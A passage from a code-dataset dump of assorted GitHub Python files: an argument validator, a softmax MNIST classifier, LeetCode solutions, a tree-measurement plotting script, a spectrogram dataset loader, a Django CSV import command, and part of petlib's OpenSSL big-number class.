self.list:\n if len(self.name) == 0:\n raise Exception('--name not specified')\n elif self.action in ['delete', 'view']:\n if len(self.name) == 0:\n raise Exception('--name not specified')\n elif self.action == 'get':\n #\n # Can be:\n # --name NAME\n # --token1 AAA --token2 BBB\n if len(self.name) == 0:\n if len(self.token1) == 0 and len(self.token2) == 0:\n raise Exception('Please specify either the name or the 2 tokens')\n\n if len(self.token1) == 0 or len(self.token2) == 0:\n raise Exception('Please specify both tokens')\n elif self.action 
in ['clear', 'list']:\n # Nothing to do here.\n pass\n","repo_name":"sadreck/rpass-python","sub_path":"src/commandline.py","file_name":"commandline.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36447049807","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 15 17:55:35 2017\n\n@author: yuqing.wang1\n\"\"\"\n\n\n# SOFTMAX - ALL IN ONE\n\nfrom keras.datasets import mnist\nimport numpy as np\n\n# load data\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nX_train = X_train.reshape((X_train.shape[0], np.product(X_train.shape[1:]))).T / 255.0\nX_test = X_test.reshape((X_test.shape[0], np.product(X_test.shape[1:]))).T / 255.0\n\n# parameters\n\n(D, N) = X_train.shape\nC = len(np.unique(y_train))\n\neps = 1e-03\nstep = 0.5\n\n# init W\n\nW = np.zeros((D, C))\n\np = np.exp(W.T.dot(X_train))\np /= np.sum(p, axis=0)\n\n# optimization\n\nloss = 1e10\nlast_loss = 0\n\nwhile np.abs(loss - last_loss) > eps:\n # compute gradient\n dW = X_train.dot(p.T) / N\n for k in range(C):\n dW[:,k] -= np.sum(X_train[:,y_train==k], axis=1) / N\n\n # gradient descent\n W -= step * dW\n\n # compute loss\n p = np.exp(W.T.dot(X_train))\n p /= np.sum(p, axis=0)\n\n last_loss = loss\n loss = 0\n for k in range(C):\n loss += - np.sum(np.log(p[k,y_train==k])) / N\n print ('Loss:', loss)\n\n# test\n\np = np.exp(W.T.dot(X_test))\np /= np.sum(p, axis=0)\n\ny = np.argmax(p, axis=0)\nacc = np.sum(y==y_test) * 1.0 / len(y)\nprint ('Accuracy:', acc)\n\nimport matplotlib.pyplot as plt\n\nnumber = 2\nplt.imshow(W[:,number].reshape([28, 28]), cmap ='gray')\n\nx = plt.imread('1.5.jpg') # generated by Photoshop\nplt.imshow(x, cmap='gray')\n\nx = (x / 255.0).reshape((28*28,1))\np = np.exp(W.T.dot(x))\np /= np.sum(p, axis=0)\nprint ('predicted to be:', np.argmax(p))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"satyrswang/practice-python","sub_path":"yin-tech/implement-keras/softmax.py","file_name":"softmax.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19381321190","text":"'''\nProblem Statement - Given an integer array nums, \nreturn true if any value appears at least twice in the array, \nand return false if every element is distinct.\nExample 1:\n\nInput: nums = [1,2,3,1]\nOutput: true\nExample 2:\n\nInput: nums = [1,2,3,4]\nOutput: false\n'''\n\n#Solution 1 - using dict\n\nclass Solution:\n def containsDuplicate(self, nums: List[int]) -> bool:\n #create an empty dict\n numsDict = {}\n for num in nums:\n '''if the key for that particular num is made already \n then the number already exists in the list, so return True'''\n if num in numsDict:\n return True\n #else add the entry for the new number\n else:\n numsDict[num] = 1\n #return false at the end of the list\n return False\n\n#Solution 1 - using set(contains unique entries)\n\nclass Solution:\n def containsDuplicate(self, nums: List[int]) -> bool:\n return len(set(nums)) < len(nums)","repo_name":"priyamore/lc-problems","sub_path":"data-structures/containsDuplicate.py","file_name":"containsDuplicate.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30113738105","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 13 19:27:48 2022\n\n@author: juani\n\"\"\"\n\nimport numpy as np\nimport os\nimport 
matplotlib.pyplot as plt\r\nimport csv\r\n\r\ndef leer_arboles(nombre_archivo):\r\n    f = open(nombre_archivo, encoding='UTF-8')\r\n    rows = csv.reader(f)\r\n    headers = next(rows)\r\n    print(headers)\r\n    arboleda = [dict(zip(headers, row)) for row in rows]\r\n    return arboleda\r\n\r\n\r\n\r\n#6.10 uncomment line 27 and comment out line 48\r\nos.path.join('..', 'Data', 'arbolado-en-espacios-verdes.csv')\r\narboleda = leer_arboles('../Data/arbolado-en-espacios-verdes.csv')\r\naltura_jacaranda = [(float(arbol['altura_tot'])) for arbol in arboleda if arbol['nombre_com'] == 'Jacarandá']\r\n#plt.hist(altura_jacaranda, bins = 30)\r\naltura_jacaranda.sort()\r\nprint(altura_jacaranda)\r\n\r\n\r\n#5.17\r\nmedidas_jacaranda = [(float(arbol['altura_tot']), int(arbol['diametro']))\r\nfor arbol in arboleda if arbol['nombre_com'] == 'Jacarandá']\r\nprint(medidas_jacaranda)\r\n\r\n\r\n#6.11 \r\ndef scatter_hd(lista_de_pares):\r\n    lista_de_pares=np.array(lista_de_pares)\r\n    # pairs are (height, diameter), so plot column 1 on x and column 0 on y to match the labels\r\n    plt.scatter(lista_de_pares[:,1] , lista_de_pares[:,0] ,alpha=0.5, c='RED')\r\n    plt.xlabel(\"diameter (cm)\")\r\n    plt.ylabel(\"height (m)\")\r\n    plt.title(\"Diameter-height relation for Jacaranda trees\")\r\n    plt.show()\r\n    \r\nscatter_hd(medidas_jacaranda)\r\n\r\n\r\n# def medidas_de_especies(especies, arboleda):\r\n#     medidas = []\r\n#     medidas.append([{e:(float(arbol['altura_tot']), int(arbol['diametro']))}for e in especies for arbol in arboleda if arbol['nombre_com'] == e])\r\n#     return medidas\r\n\r\n# os.path.join('..', 'Data', 'arbolado-en-espacios-verdes.csv')\r\n# arboleda = leer_arboles('../Data/arbolado-en-espacios-verdes.csv')\r\n# especies = ['Eucalipto', 'Palo borracho rosado', 'Jacarandá']\r\n# medidas = medidas_de_especies(especies, arboleda)\r\n# scatter_hd(medidas)","repo_name":"juanamolinalucia2001/python2C-unsam2022","sub_path":"Clase06/arboles.py","file_name":"arboles.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"28762610110","text":"'''\nGiven an unsorted array nums, reorder it such that nums[0] < nums[1] > nums[2] < nums[3]....\n\nExample 1:\n\nInput: nums = [1, 5, 1, 1, 6, 4]\nOutput: One possible answer is [1, 4, 1, 5, 1, 6].\nExample 2:\n\nInput: nums = [1, 3, 2, 2, 3, 1]\nOutput: One possible answer is [2, 3, 1, 3, 1, 2].\nNote:\nYou may assume all input has a valid answer.\n\nFollow Up:\nCan you do it in O(n) time and/or in-place with O(1) extra space?\nProblem: reorder the array into a wiggle pattern.\nApproach: sort the array first, then split it around the median; fill the even\nindices with the lower half in reverse order and the odd indices with the upper\nhalf in reverse order. Time complexity O(n log n), space complexity O(n).\n'''\n
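# Worked example (added): [1, 5, 1, 1, 6, 4] -> sorted [1, 1, 1, 4, 5, 6], med = 2;\n# evens take nums[2::-1] = [1, 1, 1], odds take nums[:2:-1] = [6, 5, 4],\n# giving [1, 6, 1, 5, 1, 4], which satisfies 1 < 6 > 1 < 5 > 1 < 4.\n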
class Solution:\n    def wiggleSort(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: void Do not return anything, modify nums in-place instead.\n        \"\"\"\n        if len(nums)<=1:\n            return\n        nums.sort()\n        med = (len(nums)-1)//2\n        nums[::2],nums[1::2]=nums[med::-1],nums[:med:-1]\n        ","repo_name":"LiqunW/LeetCode","sub_path":"LeetCode_python_solution/324. Wiggle Sort II.py","file_name":"324. Wiggle Sort II.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73957139253","text":"import os\nimport re\nimport numpy as np\nimport cv2\nfrom audio_to_melSpectrogram import create_spectrogram\nfrom slice_melSpectrogram import slice_spectrogram\nfrom keras.utils import np_utils\nfrom sklearn.model_selection import train_test_split\n\n\"\"\"\nConverts images and labels into training and testing matrices.\n\"\"\"\ndef load_dataset(mode='Train'):\n    create_spectrogram(mode)\n    slice_spectrogram(mode)\n\n    if mode==\"Train\":\n        genre = {\n            \"Hip-Hop\": 0,\n            \"International\": 1,\n            \"Electronic\": 2,\n            \"Folk\" : 3,\n            \"Experimental\": 4,\n            \"Rock\": 5,\n            \"Pop\": 6,\n            \"Instrumental\": 7\n        }\n        filenames = [\"Train_Sliced_Images\" + '/' + f for f in os.listdir(\"Train_Sliced_Images\")\n                     if f.endswith(\".jpg\")]\n        images_all = [None]*(len(filenames))\n        labels_all = [None]*(len(filenames))\n        for f in filenames:\n            index = int(re.search('Train_Sliced_Images/(.+?)_.*.jpg', f).group(1))\n            genre_variable = re.search('Train_Sliced_Images/.*_(.+?).jpg', f).group(1)\n            temp = cv2.imread(f, cv2.IMREAD_UNCHANGED)\n            images_all[index] = cv2.cvtColor(temp, cv2.COLOR_BGR2GRAY)\n            labels_all[index] = genre[genre_variable]\n        \n        images = np.array(images_all)\n        labels = np.array(labels_all)\n        labels = labels.reshape(labels.shape[0],1)\n        train_x, test_x, train_y, test_y = train_test_split(images, labels, test_size=0.05, shuffle=True)\n\n        # Convert the labels into one-hot vectors.\n        train_y = np_utils.to_categorical(train_y)\n        test_y = np_utils.to_categorical(test_y, num_classes=8)\n        n_classes = len(genre)\n        genre_new = {value: key for key, value in genre.items()}\n\n        if os.path.exists('Training_Data'):\n            train_x = np.load(\"Training_Data/train_x.npy\")\n            train_y = np.load(\"Training_Data/train_y.npy\")\n            test_x = np.load(\"Training_Data/test_x.npy\")\n            test_y = np.load(\"Training_Data/test_y.npy\")\n            return train_x, train_y, test_x, test_y, n_classes, genre_new\n\n        if not os.path.exists('Training_Data'):\n            os.makedirs('Training_Data')\n            np.save(\"Training_Data/train_x.npy\", train_x)\n            np.save(\"Training_Data/train_y.npy\", train_y)\n            np.save(\"Training_Data/test_x.npy\", test_x)\n            np.save(\"Training_Data/test_y.npy\", test_y)\n            return train_x, train_y, test_x, test_y, n_classes, genre_new\n\n    if mode==\"Test\":\n        filenames = [\"Test_Sliced_Images\" + '/' + f for f in os.listdir(\"Test_Sliced_Images\")\n                     if f.endswith(\".jpg\")]\n        images = []\n        labels = []\n        for f in filenames:\n            song_variable = re.search('Test_Sliced_Images/.*_(.+?).jpg', f).group(1)\n            tempImg = cv2.imread(f, cv2.IMREAD_UNCHANGED)\n            images.append(cv2.cvtColor(tempImg, cv2.COLOR_BGR2GRAY))\n            labels.append(song_variable)\n        \n        images = np.array(images)\n        return images, labels\n    \nif __name__ == '__main__':\n    load_dataset(mode='Train')","repo_name":"XuBLin/590PresentGroupProject","sub_path":"Recommendation system/project_final/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"15946355456","text":"import csv\n\nfrom django.core.management.base import BaseCommand\nfrom reviews.models import Category, Comment, Genre, Review, Title\nfrom users.models import User\n\n\ndef validate_required_fields(row: dict) -> bool:\n    \"\"\"Checks that the required fields are present.\"\"\"\n
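    # e.g. (added note): a row with an empty 'name' or 'slug' fails the check, while\n    # empty entries from ignore_fields below ('bio', 'description', ...) are tolerated.\n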
\n    ignore_fields: list = [\n        'description',\n        'role',\n        'bio',\n        'first_name',\n        'last_name',\n        'author',\n        'pub_date'\n    ]\n\n    for key, value in row.items():\n        if not value and key not in ignore_fields:\n            return False\n\n    return True\n\n\ndef upload_users():\n    \"\"\"Loads users.\"\"\"\n\n    with open('static/data/users.csv', encoding='utf-8') as csv_file:\n        csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n        for row in csv_reader:\n            if not validate_required_fields(row):\n                continue\n\n            user = User()\n            user.id = row['id']\n            user.username = row['username']\n            user.email = row['email']\n            user.role = row['role']\n            user.bio = row['bio']\n            user.first_name = row['first_name']\n            user.last_name = row['last_name']\n\n            user.save()\n\n\ndef upload_category():\n    \"\"\"Loads categories.\"\"\"\n\n    with open('static/data/category.csv', encoding='utf-8') as csv_file:\n        csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n        for row in csv_reader:\n            if not validate_required_fields(row):\n                continue\n\n            category = Category()\n            category.id = row['id']\n            category.name = row['name']\n            category.slug = row['slug']\n\n            category.save()\n\n\ndef upload_genre():\n    \"\"\"Loads genres.\"\"\"\n\n    with open('static/data/genre.csv', encoding='utf-8') as csv_file:\n        csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n        for row in csv_reader:\n            if not validate_required_fields(row):\n                continue\n\n            genre = Genre()\n            genre.id = row['id']\n            genre.name = row['name']\n            genre.slug = row['slug']\n\n            genre.save()\n\n\ndef upload_titles():\n    \"\"\"Loads titles.\"\"\"\n\n    with open('static/data/titles.csv', encoding='utf-8') as csv_file:\n        csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n        for row in csv_reader:\n            if not validate_required_fields(row):\n                continue\n\n            title = Title()\n            title.id = row['id']\n            title.name = row['name']\n            title.year = row['year']\n            title.category = Category.objects.get(id=row['category'])\n\n            title.save()\n\n\ndef upload_genre_title():\n    \"\"\"Loads the junction table linking genres and titles.\"\"\"\n\n    with open('static/data/genre_title.csv', encoding='utf-8') as csv_file:\n        csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n        for row in csv_reader:\n            if not validate_required_fields(row):\n                continue\n\n            title = Title.objects.get(id=row['title_id'])\n            genre = Genre.objects.get(id=row['genre_id'])\n\n            title.genre.add(genre)\n            title.save()\n\n\ndef upload_review():\n    \"\"\"Loads reviews.\"\"\"\n\n    with open('static/data/review.csv', encoding='utf-8') as csv_file:\n        csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n        for row in csv_reader:\n            if not validate_required_fields(row):\n                continue\n\n            review = Review()\n            review.id = row['id']\n            review.title = Title.objects.get(id=row['title_id'])\n            review.text = row['text']\n            review.author = User.objects.get(id=row['author'])\n            review.score = row['score']\n            review.pub_date = row['pub_date']\n\n            review.save()\n\n\ndef upload_comments():\n    \"\"\"Loads comments.\"\"\"\n\n    with open('static/data/comments.csv', encoding='utf-8') as csv_file:\n        csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n        for row in csv_reader:\n            if not validate_required_fields(row):\n                continue\n\n            comment = Comment()\n            comment.id = row['id']\n            comment.review = Review.objects.get(id=row['review_id'])\n            comment.text = row['text']\n            comment.author = User.objects.get(id=row['author'])\n            comment.pub_date = row['pub_date']\n\n            comment.save()\n\n\nclass Command(BaseCommand):\n\n    def handle(self, *args, **options):\n        upload_users()\n        upload_category()\n        upload_genre()\n        upload_titles()\n        upload_genre_title()\n        
upload_review()\n upload_comments()\n","repo_name":"Luna-luns/Review-s-collector","sub_path":"api_yamdb/reviews/management/commands/upload_data.py","file_name":"upload_data.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2506488688","text":"from .bindings import _FFI, _C, get_errors\n\nfrom functools import wraps\nfrom copy import copy, deepcopy\nfrom binascii import hexlify, unhexlify # pylint: disable=unused-import\n\n# Py2/3 compatibility\ntry:\n from builtins import int # pylint: disable=redefined-builtin\n from builtins import object # pylint: disable=redefined-builtin\nexcept BaseException: # pylint: disable=bare-except\n print(\"Cannot mock for docs\")\n\ntry:\n from future.utils import python_2_unicode_compatible\nexcept Exception as e: # pylint: disable=broad-except\n # An identity decorator\n def python_2_unicode_compatible(x): return x\n\nimport pytest\n\n\ndef force_Bn(n):\n \"\"\"A decorator that coerces the nth input to be a Big Number\"\"\"\n\n def convert_nth(f):\n # pylint: disable=star-args\n @wraps(f)\n def new_f(*args, **kwargs):\n new_args = args\n try:\n if not n < len(args) or args[n].bn: # isinstance(args[n], Bn):\n new_args = args\n except BaseException:\n # if not n < len(args):\n # new_args = args\n\n if isinstance(args[n], int):\n r = Bn.from_num(args[n])\n new_args = list(args)\n new_args[n] = r\n new_args = tuple(new_args)\n else:\n return NotImplemented\n\n return f(*new_args, **kwargs)\n\n return new_f\n return convert_nth\n\n\ndef _check(return_val):\n \"\"\"Checks the return code of the C calls\"\"\"\n if __debug__:\n if isinstance(return_val, int) and return_val == 1:\n return\n if isinstance(return_val, bool) and return_val == True:\n return\n\n if return_val == True and return_val == 1:\n return\n\n errs = get_errors()\n raise Exception(\"BN exception: %s\" % errs)\n\n\nclass BnCtx(object):\n \"\"\" A Bn Context for use by the petlib library \"\"\"\n\n __slots__ = ['bnctx', '_C']\n\n def __init__(self):\n self._C = _C\n self.bnctx = self._C.BN_CTX_new()\n _check(self.bnctx != _FFI.NULL)\n\n def __del__(self):\n if self.bnctx is not None:\n self._C.BN_CTX_free(self.bnctx)\n\n\nclass BnCtxNULL(BnCtx):\n \"\"\" A Bn Context for use by the petlib library \"\"\"\n\n __slots__ = ['bnctx', '_C']\n\n def __init__(self):\n self._C = _C\n self.bnctx = _FFI.NULL\n\n def __del__(self):\n pass\n\n\nimport threading\n_thread_local = threading.local()\n\n\ndef get_ctx():\n global _thread_local\n\n try:\n return _thread_local.ctx\n except BaseException:\n _thread_local.ctx = BnCtx()\n return _thread_local.ctx\n\n\n@python_2_unicode_compatible\nclass Bn(object):\n \"\"\"The core Big Number class.\n It supports all comparisons (<, <=, ==, !=, >=, >),\n arithmetic operations (+, -, %, /, divmod, pow)\n and copy operations (copy and deep copy). The right-hand\n side operand may be a small native python integer (<2^64). 
\"\"\"\n\n __C = _C\n\n # We know this class will keep minimal state\n __slots__ = ['bn']\n\n # -- static methods\n\n @staticmethod\n def from_num(num):\n if isinstance(num, int):\n return Bn(num)\n elif isinstance(num, Bn):\n return num\n else:\n # raise TypeError(\"Cannot coerce %s into a BN.\" % num)\n return NotImplemented\n\n @staticmethod\n def from_decimal(sdec):\n \"\"\"Creates a Big Number from a decimal string.\n\n Args:\n sdec (string): numeric string possibly starting with minus.\n\n See Also:\n str() produces a decimal string from a big number.\n\n Example:\n >>> hundred = Bn.from_decimal(\"100\")\n >>> str(hundred)\n '100'\n\n \"\"\"\n\n ptr = _FFI.new(\"BIGNUM **\")\n read_bytes = _C.BN_dec2bn(ptr, sdec.encode(\"utf8\"))\n if read_bytes != len(sdec):\n raise Exception(\"BN Error\")\n\n ret = Bn()\n _C.BN_copy(ret.bn, ptr[0])\n _C.BN_clear_free(ptr[0])\n return ret\n\n @staticmethod\n def from_hex(shex):\n \"\"\"Creates a Big Number from a hexadecimal string.\n\n Args:\n shex (string): hex (0-F) string possibly starting with minus.\n\n See Also:\n hex() produces a hexadecimal representation of a big number.\n\n Example:\n >>> Bn.from_hex(\"FF\")\n 255\n \"\"\"\n\n ptr = _FFI.new(\"BIGNUM **\")\n read_bytes = _C.BN_hex2bn(ptr, shex.encode(\"utf8\"))\n if read_bytes != len(shex):\n raise Exception(\"BN Error\")\n\n ret = Bn()\n _C.BN_copy(ret.bn, ptr[0])\n _C.BN_clear_free(ptr[0])\n return ret\n\n @staticmethod\n def from_binary(sbin):\n \"\"\"Creates a Big Number from a byte sequence representing the number in Big-endian 8 byte atoms. Only positive values can be represented as byte sequence, and the library user should store the sign bit separately.\n\n Args:\n sbin (string): a byte sequence.\n\n Example:\n >>> byte_seq = unhexlify(b\"010203\")\n >>> Bn.from_binary(byte_seq)\n 66051\n >>> (1 * 256**2) + (2 * 256) + 3\n 66051\n \"\"\"\n ret = Bn()\n _C.BN_bin2bn(sbin, len(sbin), ret.bn)\n return ret\n\n @staticmethod\n def get_prime(bits, safe=1):\n \"\"\"\n Builds a prime Big Number of length bits.\n\n Args:\n bits (int) -- the number of bits.\n safe (int) -- 1 for a safe prime, otherwise 0.\n\n \"\"\"\n _check(0 < bits < 10000)\n _check(safe in [0, 1])\n\n ret = Bn()\n _check(\n _C.BN_generate_prime_ex(\n ret.bn,\n bits,\n safe,\n _FFI.NULL,\n _FFI.NULL,\n _FFI.NULL))\n return ret\n\n ## -- methods\n\n _upper_bound = 2**(64 - 1)\n\n def __init__(self, num=0):\n 'Allocate a Big Number structure, initialized with a small integer or zero.'\n self.bn = _C.BN_new()\n\n if num == 0:\n return\n\n if __debug__:\n _check(0 <= abs(num) <= self._upper_bound)\n _check(isinstance(num, int))\n\n # Assign\n if num != 0:\n ret = _C.BN_set_word(self.bn, abs(num))\n if __debug__:\n _check(ret)\n if ret != 1:\n raise Exception(\"Bn Exception.\")\n\n if num < 0:\n self._set_neg(1)\n\n def _set_neg(self, sign=1):\n # \"\"\"Sets the sign to \"-\" (1) or \"+\" (0)\"\"\"\n if not (sign == 0 or sign == 1):\n raise Exception(\"Sign has to be 0 or 1.\")\n _C.BN_set_negative(self.bn, sign)\n\n def copy(self):\n \"\"\"Returns a copy of the Bn object.\"\"\"\n return self.__copy__()\n\n def __copy__(self):\n # 'Copies the big number. 
Support for copy module'\n other = Bn()\n _C.BN_copy(other.bn, self.bn)\n return other\n\n def __deepcopy__(self, memento):\n # 'Deepcopy is the same as copy'\n # pylint: disable=unused-argument\n return self.__copy__()\n\n def __del__(self):\n # 'Deallocate all resources of the big number'\n self.__C.BN_clear_free(self.bn)\n\n def __inner_cmp__(self, other):\n # 'Irel comparison function'\n # if __debug__:\n # _check( type(other) == Bn )\n try:\n sig = int(_C.BN_cmp(self.bn, other.bn))\n return sig\n except AttributeError:\n return self.__inner_cmp__(Bn.from_num(other))\n\n def __lt__(self, other):\n return self.__inner_cmp__(other) < 0\n\n def __le__(self, other):\n return self.__inner_cmp__(other) <= 0\n\n def __eq__(self, other):\n if isinstance(other, int):\n other = Bn(other)\n if not isinstance(other, Bn):\n return False\n return self.__inner_cmp__(other) == 0\n\n def __ne__(self, other):\n return self.__inner_cmp__(other) != 0\n\n def __gt__(self, other):\n return self.__inner_cmp__(other) > 0\n\n def __ge__(self, other):\n return self.__inner_cmp__(other) >= 0\n\n def bool(self):\n 'Turn Bn into boolean. False if zero, True otherwise.'\n return self.__bool__()\n\n def __bool__(self):\n # 'Turn into boolean'\n return not (self == Bn(0))\n\n # Python 2 compatibility\n def __nonzero__(self):\n return self.__bool__()\n\n # Export in different representations\n\n def repr(self):\n 'The representation of the number as a decimal string'\n return self.__repr__()\n\n def __repr__(self):\n # 'The representation of the number as a decimal string'\n buf = _C.BN_bn2dec(self.bn)\n s = bytes(_FFI.string(buf))\n _C.OPENSSL_free(buf)\n return s.decode('utf8')\n\n def int(self):\n \"\"\"A native python integer representation of the Big Number.\n Synonym for int(bn).\n \"\"\"\n return self.__int__()\n\n def __int__(self):\n return int(self.__repr__())\n\n def __index__(self):\n return int(self.__repr__())\n\n def hex(self):\n \"\"\"The representation of the string in hexadecimal.\n Synonym for hex(n).\"\"\"\n return self.__hex__()\n\n def __hex__(self):\n # \"\"\"The representation of the string in hexadecimal\"\"\"\n buf = _C.BN_bn2hex(self.bn)\n s = bytes(_FFI.string(buf))\n _C.OPENSSL_free(buf)\n return s.decode(\"utf8\")\n\n def binary(self):\n \"\"\"Returns a byte sequence storing the absolute value of the Big\n Number in Big-Endian format (with 8 bit atoms). You need to extact the sign separately.\n\n Example:\n >>> bin = Bn(66051).binary()\n >>> hexlify(bin) == b'010203'\n True\n \"\"\"\n if self < 0:\n raise Exception(\"Cannot represent negative numbers\")\n size = _C.bn_num_bytes(self.bn)\n bin_string = _FFI.new(\"unsigned char[]\", size)\n\n l = _C.BN_bn2bin(self.bn, bin_string)\n assert int(l) == size\n return bytes(_FFI.buffer(bin_string)[:])\n\n def random(self):\n \"\"\"Returns a cryptographically strong random number 0 <= rnd < self.\n\n Example:\n >>> r = Bn(100).random()\n >>> 0 <= r < 100\n True\n\n \"\"\"\n rnd = Bn()\n err = _C.BN_rand_range(rnd.bn, self.bn)\n if __debug__:\n _check(err)\n return rnd\n\n # ---------- Arithmetic --------------\n\n def int_neg(self):\n \"\"\"Returns the negative of this number. Synonym with -self.\n\n Example:\n\n >>> one100 = Bn(100)\n >>> one100.int_neg()\n -100\n >>> -one100\n -100\n\n \"\"\"\n return self.__neg__()\n\n def int_add(self, other):\n \"\"\"Returns the sum of this number with another. 
Synonym for self + other.\n\n Example:\n\n >>> one100 = Bn(100)\n >>> two100 = Bn(200)\n >>> two100.int_add(one100) # Function syntax\n 300\n >>> two100 + one100 # Operator syntax\n 300\n\n \"\"\"\n return self.__add__(other)\n\n def __radd__(self, other):\n return self.__add__(other)\n\n def __add__(self, other):\n try:\n r = Bn()\n err = _C.BN_add(r.bn, self.bn, other.bn)\n\n if __debug__:\n _check(err)\n return r\n except AttributeError:\n return self.__add__(Bn.from_num(other))\n\n def int_sub(self, other):\n \"\"\"Returns the difference between this number and another.\n Synonym for self - other.\n\n Example:\n\n >>> one100 = Bn(100)\n >>> two100 = Bn(200)\n >>> two100.int_sub(one100) # Function syntax\n 100\n >>> two100 - one100 # Operator syntax\n 100\n\n \"\"\"\n return self - other\n\n def __rsub__(self, other):\n return Bn(other) - self\n\n def __sub__(self, other):\n try:\n r = Bn()\n err = _C.BN_sub(r.bn, self.bn, other.bn)\n\n if __debug__:\n _check(err)\n\n return r\n except AttributeError:\n return self.__sub__(Bn.from_num(other))\n\n def int_mul(self, other):\n \"\"\"Returns the product of this number with another.\n Synonym for self * other.\n\n Example:\n\n >>> one100 = Bn(100)\n >>> two100 = Bn(200)\n >>> one100.int_mul(two100) # Function syntax\n 20000\n >>> one100 * two100 # Operator syntax\n 20000\n\n \"\"\"\n return self.__mul__(other)\n\n def __rmul__(self, other):\n return self.__mul__(other)\n\n def __mul__(self, other):\n\n try:\n r = Bn()\n local_ctx = get_ctx()\n err = _C.BN_mul(r.bn, self.bn, other.bn, local_ctx.bnctx)\n\n if __debug__:\n _check(err)\n\n return r\n except AttributeError:\n other = Bn.from_num(other)\n if other is NotImplemented:\n return NotImplemented\n return self.__mul__(other)\n\n\n# ------------------ Mod arithmetic -------------------------\n\n\n def mod_add(self, other, m):\n \"\"\"\n mod_add(other, m)\n Returns the sum of self and other modulo m.\n\n Example:\n\n >>> Bn(10).mod_add(Bn(2), Bn(11)) # Only function notation available\n 1\n\n \"\"\"\n try:\n r = Bn()\n local_ctx = get_ctx()\n err = _C.BN_mod_add(r.bn, self.bn, other.bn, m.bn, local_ctx.bnctx)\n if __debug__:\n _check(err)\n\n return r\n except AttributeError:\n return self.mod_add(Bn.from_num(other), Bn.from_num(m))\n\n def mod_sub(self, other, m):\n \"\"\"\n mod_sub(other, m)\n Returns the difference of self and other modulo m.\n\n Example:\n\n >>> Bn(10).mod_sub(Bn(2), Bn(11)) # Only function notation available\n 8\n\n \"\"\"\n\n try:\n r = Bn()\n local_ctx = get_ctx()\n err = _C.BN_mod_sub(r.bn, self.bn, other.bn, m.bn, local_ctx.bnctx)\n\n if __debug__:\n _check(err)\n\n return r\n except AttributeError:\n return self.mod_sub(Bn.from_num(other), Bn.from_num(m))\n\n def mod_mul(self, other, m):\n \"\"\"\n mod_mul(other, m)\n Return the product of self and other modulo m.\n\n Example:\n\n >>> Bn(10).mod_mul(Bn(2), Bn(11)) # Only function notation available\n 9\n\n \"\"\"\n try:\n r = Bn()\n local_ctx = get_ctx()\n err = _C.BN_mod_mul(r.bn, self.bn, other.bn, m.bn, local_ctx.bnctx)\n\n if __debug__:\n _check(err)\n\n return r\n except AttributeError:\n return self.mod_mul(Bn.from_num(other), Bn.from_num(m))\n\n def mod_inverse(self, m):\n \"\"\"\n mod_inverse(m)\n Compute the inverse mod m, such that self * res == 1 mod m.\n\n Example:\n\n >>> Bn(10).mod_inverse(m = Bn(11)) # Only function notation available\n 10\n >>> Bn(10).mod_mul(Bn(10), m = Bn(11)) == Bn(1)\n True\n\n \"\"\"\n\n try:\n res = Bn()\n local_ctx = get_ctx()\n err = _C.BN_mod_inverse(res.bn, self.bn, 
m.bn, local_ctx.bnctx)\n\n if err == _FFI.NULL:\n errs = get_errors()\n\n if errs == [50770023]:\n raise Exception(\"No inverse\")\n\n elif errs == [50782316]:\n raise Exception(\"No inverse\")\n\n else:\n raise Exception(\"Unknown error: %s\" % errs)\n\n return res\n except AttributeError:\n return self.mod_inverse(Bn.from_num(m))\n\n def mod_pow(self, other, m, ctx=None):\n \"\"\" Performs the modular exponentiation of self ** other % m.\n\n Example:\n >>> one100 = Bn(100)\n >>> one100.mod_pow(2, 3) # Modular exponentiation\n 1\n\n \"\"\"\n return self.__pow__(other, m, ctx=ctx)\n\n def divmod(self, other):\n \"\"\"Returns the integer division and remainder of this number by another.\n Synonym for (div, mod) = divmod(self, other)\"\"\"\n return self.__divmod__(other)\n\n def __rdivmod__(self, other):\n return Bn(other).__divmod__(self)\n\n def __divmod__(self, other):\n try:\n dv = Bn()\n rem = Bn()\n local_ctx = get_ctx()\n ret = _C.BN_div(dv.bn, rem.bn, self.bn, other.bn, local_ctx.bnctx)\n if __debug__:\n _check(ret)\n return (dv, rem)\n except AttributeError:\n return self.__divmod__(Bn.from_num(other))\n\n def int_div(self, other):\n \"\"\"Returns the integer division of this number by another.\n Synonym of self / other.\n\n Example:\n\n >>> one100 = Bn(100)\n >>> two100 = Bn(200)\n >>> two100.int_div(one100) # Function syntax\n 2\n >>> two100 / one100 # Operator syntax\n 2\n\n \"\"\"\n return self.__div__(other)\n\n def __rdiv__(self, other):\n return Bn(other).__div__(self)\n\n def __div__(self, other):\n dv, _ = divmod(self, other)\n return dv\n\n def mod(self, other):\n \"\"\"Returns the remainder of this number modulo another.\n Synonym for self % other.\n\n Example:\n\n >>> 